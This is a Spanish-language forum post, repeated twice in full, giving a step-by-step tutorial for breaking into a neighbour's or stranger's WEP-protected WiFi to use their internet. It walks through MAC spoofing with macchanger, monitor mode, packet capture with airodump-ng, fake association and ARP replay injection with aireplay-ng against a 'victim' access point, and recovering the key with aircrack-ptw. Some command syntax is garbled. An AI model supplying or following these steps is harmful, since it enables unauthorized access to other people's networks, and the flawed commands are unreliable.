VULNERABILIDAD DE LA SEGURIDAD WIFI
Hola gente que tal a los tiempos que me conecto y sobre todo de tiempo que posteo algo recuerdan el post de las llamadas gratis a movistar y claro jajaja en fin. El tema de hoy es como conectarnos a la red un vecino o alguien extraño que nuestra laptop o pc la detecta con buena o poca señal (obviamente con clave) y posteriormente navegar por internet. La respuesta es con Wifiway y muchas herramientas los cuales nos van a permitir medir la seguridad de las redes wifi y ver la clave, sin mas preámbulo vallamos al grano.
Antes de entrar al tema lean en internet todo lo referente a redes wifi, voy a asumir que ustedes ya tienen conocimientos básicos del mismo.
Herramientas
1.Bajar primeramente el Cd de wifiway 1 en internet lo encuentran.
2.Adaptador RTL8187 1000mw + Antena de 5dbi , ustedes pueden probar con cualquier otro adaptador que soporte modo monitor, los atheros son buenos.
3.Bajamos el programa MAC Address Changer
4.Leer y comprenderlo, no voy a responder preguntas tontas.
Estamos Listo!
Voy a empesar asumiendo que ya tienen cargado wifiway en su pc y están en el escritorio. Perfecto!.
Los drivers de inyección del chisept ya vienen cargados.
Abrimos una consola y tecleamos:
#iwconfig
Y nos sale interface de nuestro adaptador en mi caso me sale que mi adaptador es “wlan0”
Vamos a cambiarle la mac:
#macchanger -m 00:01:02:03:04:05 wlan0
El sistema responde:
Ponemos la tarjeta en modo monitor:
#airmon-ng start wlan0
El sistema responde:
Tenemos todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:
#airodump-ng wlan0
Veremos una lista de los AP:
Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).
Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.
#airodump-ng -w [nompre puede ser cualquirera] -c [channel] -w [iface]
En nuestro caso:
#airodump-ng -w captura -c 6 wlan0
El sistema responde:
Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:
#aireplay-ng -1 0 -e [bssid] –a [mac_targeta victima] –h [mac_nuestra targeta] [iface]
Nuestro ejemplo:
# aireplay-ng -1 0 -e NOMBRE_DE_LA_VICTIMA -a 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Si todo va bien, tenemos que ver esto:
Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque para conseguir un paquete de datos WEP:
#aireplay-ng -3 -b [mac_targeta victima] -h [mac_nuestra targeta] [iface]
Sigamos con nuestro ejemplo:
#aireplay-ng -3 -b 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Puede tardar más o menos pero nos tiene que salir algo así:
Tomamos nota de la STATION de nuestro AP victima
Apuntamos la MAC 00 1E 65 52 A3 D4
Si no nos sale paciencia en algún momento alguien se conectara al AP víctima y saldrá atento por que aparece y desaparece repentinamente.
Otro método es con el wiresharck por el momento no viene al caso.
Estos apuntes que has realizado apúntalos en un papelito que luego lo usaremos.
Ahora solos esperemos que capture 100 000 ARP o sino 50 000 #DATA como mínimo , en mi caso en 45 minutos de dejado prendido me había capturado más de 1 millón de data :D , Paciencia!
Una vez capturado los paquetes necesarios le damos Ctrl+c a la captura para pararlo.
En el root Miran el archivo captura más grande en mi caso fue el captura-01 en el suyo puede tal vez captura-02. En el mismo terminal digitamos.
Sigamos con nuestro ejemplo:
#aircrack-ptw captura-01.cap
Donde dice key found with len 05: “09 19 68 XX XX” , esta es la clave! Si llegaste hasta aquí ya estás muy cerca para probar la clave.
SIGUE............. POST SIGUIENTE!
................
..........
......
...
..
.
.
.
.
.
Hola gente que tal a los tiempos que me conecto y sobre todo de tiempo que posteo algo recuerdan el post de las llamadas gratis a movistar y claro jajaja en fin. El tema de hoy es como conectarnos a la red un vecino o alguien extraño que nuestra laptop o pc la detecta con buena o poca señal (obviamente con clave) y posteriormente navegar por internet. La respuesta es con Wifiway y muchas herramientas los cuales nos van a permitir medir la seguridad de las redes wifi y ver la clave, sin mas preámbulo vallamos al grano.
Antes de entrar al tema lean en internet todo lo referente a redes wifi, voy a asumir que ustedes ya tienen conocimientos básicos del mismo.
Herramientas
1.Bajar primeramente el Cd de wifiway 1 en internet lo encuentran.
2.Adaptador RTL8187 1000mw + Antena de 5dbi , ustedes pueden probar con cualquier otro adaptador que soporte modo monitor, los atheros son buenos.
3.Bajamos el programa MAC Address Changer
4.Leer y comprenderlo, no voy a responder preguntas tontas.
Estamos Listo!
Voy a empesar asumiendo que ya tienen cargado wifiway en su pc y están en el escritorio. Perfecto!.
Los drivers de inyección del chisept ya vienen cargados.
Abrimos una consola y tecleamos:
#iwconfig
Y nos sale interface de nuestro adaptador en mi caso me sale que mi adaptador es “wlan0”
Vamos a cambiarle la mac:
#macchanger -m 00:01:02:03:04:05 wlan0
El sistema responde:
Ponemos la tarjeta en modo monitor:
#airmon-ng start wlan0
El sistema responde:
Tenemos todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:
#airodump-ng wlan0
Veremos una lista de los AP:
Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).
Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.
#airodump-ng -w [nompre puede ser cualquirera] -c [channel] -w [iface]
En nuestro caso:
#airodump-ng -w captura -c 6 wlan0
El sistema responde:
Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:
#aireplay-ng -1 0 -e [bssid] –a [mac_targeta victima] –h [mac_nuestra targeta] [iface]
Nuestro ejemplo:
# aireplay-ng -1 0 -e NOMBRE_DE_LA_VICTIMA -a 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Si todo va bien, tenemos que ver esto:
Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque para conseguir un paquete de datos WEP:
#aireplay-ng -3 -b [mac_targeta victima] -h [mac_nuestra targeta] [iface]
Sigamos con nuestro ejemplo:
#aireplay-ng -3 -b 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Puede tardar más o menos pero nos tiene que salir algo así:
Tomamos nota de la STATION de nuestro AP victima
Apuntamos la MAC 00 1E 65 52 A3 D4
Si no nos sale paciencia en algún momento alguien se conectara al AP víctima y saldrá atento por que aparece y desaparece repentinamente.
Otro método es con el wiresharck por el momento no viene al caso.
Estos apuntes que has realizado apúntalos en un papelito que luego lo usaremos.
Ahora solos esperemos que capture 100 000 ARP o sino 50 000 #DATA como mínimo , en mi caso en 45 minutos de dejado prendido me había capturado más de 1 millón de data :D , Paciencia!
Una vez capturado los paquetes necesarios le damos Ctrl+c a la captura para pararlo.
En el root Miran el archivo captura más grande en mi caso fue el captura-01 en el suyo puede tal vez captura-02. En el mismo terminal digitamos.
Sigamos con nuestro ejemplo:
#aircrack-ptw captura-01.cap
Donde dice key found with len 05: “09 19 68 XX XX” , esta es la clave! Si llegaste hasta aquí ya estás muy cerca para probar la clave.
SIGUE............. POST SIGUIENTE!
................
..........
......
...
..
.
.
.
.
.
Comentario